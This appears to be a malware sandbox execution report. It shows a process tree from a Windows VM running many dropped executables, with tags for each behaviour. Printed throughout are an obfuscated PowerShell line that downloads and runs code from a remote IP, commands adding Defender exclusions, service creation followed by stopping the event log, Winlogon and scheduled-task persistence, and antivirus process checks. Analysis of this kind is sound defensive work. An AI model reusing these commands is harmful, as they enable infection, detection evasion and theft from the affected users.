C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 011⤵
- Power Settings
PID:2776
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 011⤵
- Power Settings
PID:4984
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 011⤵
- Power Settings
PID:3604
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 011⤵
- Power Settings
PID:3936
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe11⤵PID:3184
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "LIB"11⤵
- Launches sc.exe
PID:4488
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"11⤵
- Launches sc.exe
PID:4504
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog11⤵
- Launches sc.exe
PID:4088 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:3144
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "LIB"11⤵
- Launches sc.exe
PID:4132 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:5148
-
-
-
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:5072
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\L.exe"C:\Users\Admin\AppData\Local\Temp\a\L.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5232
-
-
C:\Users\Admin\AppData\Local\Temp\a\ttl.exe"C:\Users\Admin\AppData\Local\Temp\a\ttl.exe"3⤵
- Executes dropped EXE
PID:5372
-
-
C:\Users\Admin\AppData\Local\Temp\a\caspol.exe"C:\Users\Admin\AppData\Local\Temp\a\caspol.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2836 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\caspol.exe"4⤵
- Command and Scripting Interpreter: PowerShell
PID:4804 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:2960
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\caspol.exe"C:\Users\Admin\AppData\Local\Temp\a\caspol.exe"4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
PID:756
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\rodda.exe"C:\Users\Admin\AppData\Local\Temp\a\rodda.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4568
-
-
C:\Users\Admin\AppData\Local\Temp\a\caspol.exe"C:\Users\Admin\AppData\Local\Temp\a\caspol.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5960 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\caspol.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:2040 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:4432
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\caspol.exe"C:\Users\Admin\AppData\Local\Temp\a\caspol.exe"4⤵
- Executes dropped EXE
PID:2360
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\chelentano.exe"C:\Users\Admin\AppData\Local\Temp\a\chelentano.exe"3⤵
- Executes dropped EXE
PID:2072 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2072 -s 2484⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5984
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\stories.exe"C:\Users\Admin\AppData\Local\Temp\a\stories.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1720 -
C:\Users\Admin\AppData\Local\Temp\is-4TPTU.tmp\stories.tmp"C:\Users\Admin\AppData\Local\Temp\is-4TPTU.tmp\stories.tmp" /SL5="$1801A8,5532893,721408,C:\Users\Admin\AppData\Local\Temp\a\stories.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4676 -
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" pause shine-encoder_111525⤵PID:2092
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5024
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 pause shine-encoder_111526⤵PID:5896
-
-
-
C:\Users\Admin\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe"C:\Users\Admin\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe" -i5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1480
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\lum250.exe"C:\Users\Admin\AppData\Local\Temp\a\lum250.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5364
-
-
C:\Users\Admin\AppData\Local\Temp\a\random.exe"C:\Users\Admin\AppData\Local\Temp\a\random.exe"3⤵
- Adds Run key to start application
PID:5308 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\kreon.exe"4⤵PID:1728
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:4968
-
-
C:\Windows\system32\cmd.execmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\kreon.exe"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5904 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
PID:5152
-
-
C:\Windows\system32\PING.EXEping localhost -n 16⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5656
-
-
C:\Users\Admin\AppData\Local\kreon.exeC:\Users\Admin\AppData\Local\kreon.exe6⤵PID:932
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Autoupdate.exe"C:\Users\Admin\AppData\Local\Temp\a\Autoupdate.exe"3⤵PID:2828
-
-
C:\Users\Admin\AppData\Local\Temp\a\SecurityHealthService.exe"C:\Users\Admin\AppData\Local\Temp\a\SecurityHealthService.exe"3⤵PID:700
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 7 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\Windows Security Health Host.exe,"4⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5224 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:2532
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 75⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2648
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\Windows Security Health Host.exe,"5⤵
- Modifies WinLogon for persistence
PID:9496
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 12 > nul && copy "C:\Users\Admin\AppData\Local\Temp\a\SecurityHealthService.exe" "C:\Users\Admin\Music\Windows Security Health Host.exe" && ping 127.0.0.1 -n 12 > nul && "C:\Users\Admin\Music\Windows Security Health Host.exe"4⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4952 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3324
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 125⤵
- Runs ping.exe
PID:856
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 125⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6788
-
-
C:\Users\Admin\Music\Windows Security Health Host.exe"C:\Users\Admin\Music\Windows Security Health Host.exe"5⤵
- Suspicious use of SetThreadContext
PID:6364 -
C:\Users\Admin\Music\Windows Security Health Host.exe"C:\Users\Admin\Music\Windows Security Health Host.exe"6⤵PID:8752
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Geek_se.exe"C:\Users\Admin\AppData\Local\Temp\a\Geek_se.exe"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2660
-
-
C:\Users\Admin\AppData\Local\Temp\a\GOLD.exe"C:\Users\Admin\AppData\Local\Temp\a\GOLD.exe"3⤵PID:3340
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3340 -s 7644⤵
- Program crash
PID:12608
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\OLDxTEAM.exe"C:\Users\Admin\AppData\Local\Temp\a\OLDxTEAM.exe"3⤵PID:11832
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 11832 -s 7644⤵
- Program crash
PID:12212
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\ZharkBOT.exe"C:\Users\Admin\AppData\Local\Temp\a\ZharkBOT.exe"3⤵PID:12232
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12232 -s 4484⤵
- Program crash
PID:8580
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\svchot%20-%20%E5%89%AF%E6%9C%AC.exe"C:\Users\Admin\AppData\Local\Temp\a\svchot%20-%20%E5%89%AF%E6%9C%AC.exe"3⤵
- Drops file in System32 directory
PID:11172 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\Admin\AppData\Local\Temp\a\SVCHOT~1.EXE > nul4⤵PID:11252
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:1736
-
-
C:\Windows\SysWOW64\PING.EXEping -n 2 127.0.0.15⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3648
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\svcyr.exe"C:\Users\Admin\AppData\Local\Temp\a\svcyr.exe"3⤵
- Drops file in Windows directory
PID:5668
-
-
C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe"3⤵PID:6936
-
-
C:\Users\Admin\AppData\Local\Temp\a\espsemhvcioff.exe"C:\Users\Admin\AppData\Local\Temp\a\espsemhvcioff.exe"3⤵PID:2808
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4960
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\esphvcion.exe"C:\Users\Admin\AppData\Local\Temp\a\esphvcion.exe"3⤵PID:13676
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:13636
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\aimhvcion.exe"C:\Users\Admin\AppData\Local\Temp\a\aimhvcion.exe"3⤵PID:17656
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Suspicious use of SetWindowsHookEx
PID:17668
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\aimsemhvcioff.exe"C:\Users\Admin\AppData\Local\Temp\a\aimsemhvcioff.exe"3⤵PID:3468
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:5248
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\djksahjkdhkh.exe"C:\Users\Admin\AppData\Local\Temp\a\djksahjkdhkh.exe"3⤵PID:7188
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:7212
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\dkasjhajksdhdjkas.exe"C:\Users\Admin\AppData\Local\Temp\a\dkasjhajksdhdjkas.exe"3⤵PID:10320
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:17676
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\RuntimeBrikon.exe"C:\Users\Admin\AppData\Local\Temp\a\RuntimeBrikon.exe"3⤵PID:8068
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\a\RuntimeBrikon.exe" MD5 | find /i /v "md5" | find /i /v "certutil"4⤵PID:12644
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:13816
-
-
C:\Windows\system32\certutil.execertutil -hashfile "C:\Users\Admin\AppData\Local\Temp\a\RuntimeBrikon.exe" MD55⤵PID:16612
-
-
C:\Windows\system32\find.exefind /i /v "md5"5⤵PID:13788
-
-
C:\Windows\system32\find.exefind /i /v "certutil"5⤵PID:13764
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo Couldn't resolve host name && timeout /t 5"4⤵PID:13564
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:13524
-
-
C:\Windows\system32\cmd.execmd /C "color b && title Error && echo Couldn't resolve host name && timeout /t 5"5⤵PID:13308
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:13244
-
-
C:\Windows\system32\timeout.exetimeout /t 56⤵
- Delays execution with timeout.exe
PID:12868
-
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 8068 -s 9884⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:12928
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\sjkhjkh.exe"C:\Users\Admin\AppData\Local\Temp\a\sjkhjkh.exe"3⤵PID:11096
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Suspicious use of SetWindowsHookEx
PID:7888
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\jdkashk.exe"C:\Users\Admin\AppData\Local\Temp\a\jdkashk.exe"3⤵PID:18012
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:18108
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\dlhost.exe"C:\Users\Admin\AppData\Local\Temp\a\dlhost.exe"3⤵
- Adds Run key to start application
PID:7556 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\dlhost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:8524 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:9272
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dlhost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:8884 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:11136
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dlhost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:9560 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:9596
-
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "dlhost" /tr "C:\Users\Admin\AppData\Local\Temp\dlhost.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:12224 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5136
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\ha7dur10.exe"C:\Users\Admin\AppData\Local\Temp\a\ha7dur10.exe"3⤵PID:6480
-
C:\Windows\Temp\{EFA5A259-4166-426E-9202-E42F473A3E7B}\.cr\ha7dur10.exe"C:\Windows\Temp\{EFA5A259-4166-426E-9202-E42F473A3E7B}\.cr\ha7dur10.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\a\ha7dur10.exe" -burn.filehandle.attached=728 -burn.filehandle.self=5644⤵
- Loads dropped DLL
PID:6736 -
C:\Windows\Temp\{70D15140-DBC1-41B4-B59A-39BEFCC00F61}\.ba\Newfts.exe"C:\Windows\Temp\{70D15140-DBC1-41B4-B59A-39BEFCC00F61}\.ba\Newfts.exe"5⤵PID:11988
-
C:\Users\Admin\AppData\Roaming\Fbhost_alpha\Newfts.exeC:\Users\Admin\AppData\Roaming\Fbhost_alpha\Newfts.exe6⤵PID:18316
-
C:\Users\Admin\AppData\Roaming\Fbhost_alpha\tcpvcon.exe"C:\Users\Admin\AppData\Roaming\Fbhost_alpha\tcpvcon.exe" "C:\Users\Admin\AppData\Roaming\Fbhost_alpha\tcpvcon.exe" /accepteula7⤵PID:9928
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\gaozw40v.exe"C:\Users\Admin\AppData\Local\Temp\a\gaozw40v.exe"3⤵PID:8252
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "YIFRWLJF"4⤵
- Launches sc.exe
PID:6604
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "YIFRWLJF" binpath= "C:\ProgramData\gaeucrwzinlx\bbwduuyjdzsp.exe" start= "auto"4⤵
- Launches sc.exe
PID:6476 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:6460
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:6884 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:6908
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "YIFRWLJF"4⤵
- Launches sc.exe
PID:6892 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:6924
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\41m98slk.exe"C:\Users\Admin\AppData\Local\Temp\a\41m98slk.exe"3⤵PID:13484
-
C:\Windows\SysWOW64\cmd.execmd.exe /C wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value4⤵PID:8320
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:8468
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value5⤵
- System Location Discovery: System Language Discovery
PID:10196
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\.ses",start4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook accounts
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- Suspicious use of FindShellTrayWindow
- outlook_office_path
- outlook_win_path
PID:13420
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13484 -s 4244⤵
- Program crash
PID:8428
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\88851n80.exe"C:\Users\Admin\AppData\Local\Temp\a\88851n80.exe"3⤵PID:18196
-
C:\Users\Admin\AppData\Local\WahhVasyaa\88851n80.exe"C:\Users\Admin\AppData\Local\WahhVasyaa\88851n80.exe"4⤵
- Suspicious use of SetWindowsHookEx
PID:6860
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\99awhy8l.exe"C:\Users\Admin\AppData\Local\Temp\a\99awhy8l.exe"3⤵PID:10440
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Impacts Impacts.bat & Impacts.bat4⤵PID:10888
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:10916
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:14652
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"5⤵PID:8096
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:13268
-
-
C:\Windows\SysWOW64\findstr.exefindstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"5⤵PID:13248
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 5786785⤵PID:7500
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "PEACEFOLKSEXUALISLANDS" Hill5⤵PID:10656
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Webpage + ..\Von + ..\Exotic + ..\Relief + ..\Seo + ..\Serious + ..\Myth y5⤵PID:14920
-
-
C:\Users\Admin\AppData\Local\Temp\578678\Cooper.pifCooper.pif y5⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:9220
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵PID:8808
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\MJPVgHw.exe"C:\Users\Admin\AppData\Local\Temp\a\MJPVgHw.exe"3⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:11608 -
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"4⤵PID:2348
-
-
C:\Windows\system32\audiodg.exe"C:\Windows\system32\audiodg.exe"4⤵
- Adds Run key to start application
PID:11680
-
-
C:\Windows\system32\msiexec.exe"C:\Windows\system32\msiexec.exe"4⤵
- Adds Run key to start application
PID:11700
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\2r61ahry.exe"C:\Users\Admin\AppData\Local\Temp\a\2r61ahry.exe"3⤵PID:6988
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
PID:2060 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:6956
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
PID:13764 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:13548
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
PID:12644 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:13788
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
PID:13644 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:13472
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "VJAODQWN"4⤵
- Launches sc.exe
PID:7444 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:13448
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "VJAODQWN" binpath= "C:\ProgramData\ztngybkovyeb\qsjxfirefkza.exe" start= "auto"4⤵
- Launches sc.exe
PID:12896 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:12840
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:3492 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:13944
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "VJAODQWN"4⤵
- Launches sc.exe
PID:17316 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:13960
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\ohtie89k.exe"C:\Users\Admin\AppData\Local\Temp\a\ohtie89k.exe"3⤵PID:17864
-
C:\ProgramData\windows.exe"C:\ProgramData\windows.exe"4⤵PID:14164
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:18344
-
-
-
C:\ProgramData\service.exe"C:\ProgramData\service.exe"4⤵
- Drops startup file
- Adds Run key to start application
PID:18372 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "service" /tr "C:\Users\Admin\AppData\Roaming\service.exe"5⤵
- Scheduled Task/Job: Scheduled Task
PID:7684 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
PID:5284
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\te3tlsre.exe"C:\Users\Admin\AppData\Local\Temp\a\te3tlsre.exe"3⤵PID:2832
-
-
C:\Users\Admin\AppData\Local\Temp\a\ama.exe"C:\Users\Admin\AppData\Local\Temp\a\ama.exe"3⤵PID:12156
-
C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"4⤵PID:9616
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main5⤵PID:15040
-
-
C:\Users\Admin\AppData\Local\Temp\10007460101\4a9af1fc30.exe"C:\Users\Admin\AppData\Local\Temp\10007460101\4a9af1fc30.exe"5⤵PID:15392
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\qth5kdee.exe"C:\Users\Admin\AppData\Local\Temp\a\qth5kdee.exe"3⤵PID:17216
-
-
C:\Users\Admin\AppData\Local\Temp\a\88aext0k.exe"C:\Users\Admin\AppData\Local\Temp\a\88aext0k.exe"3⤵PID:15880
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
PID:16952
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
PID:2284
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
PID:16912
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
PID:17032
-
-
C:\Windows\explorer.exeexplorer.exe4⤵PID:17364
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\ji2xlo1f.exe"C:\Users\Admin\AppData\Local\Temp\a\ji2xlo1f.exe"3⤵PID:12908
-
-
C:\Users\Admin\AppData\Local\Temp\a\sgx4824p.exe"C:\Users\Admin\AppData\Local\Temp\a\sgx4824p.exe"3⤵PID:17152
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Za Za.bat & Za.bat4⤵PID:7524
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:6740
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"5⤵PID:2316
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:15708
-
-
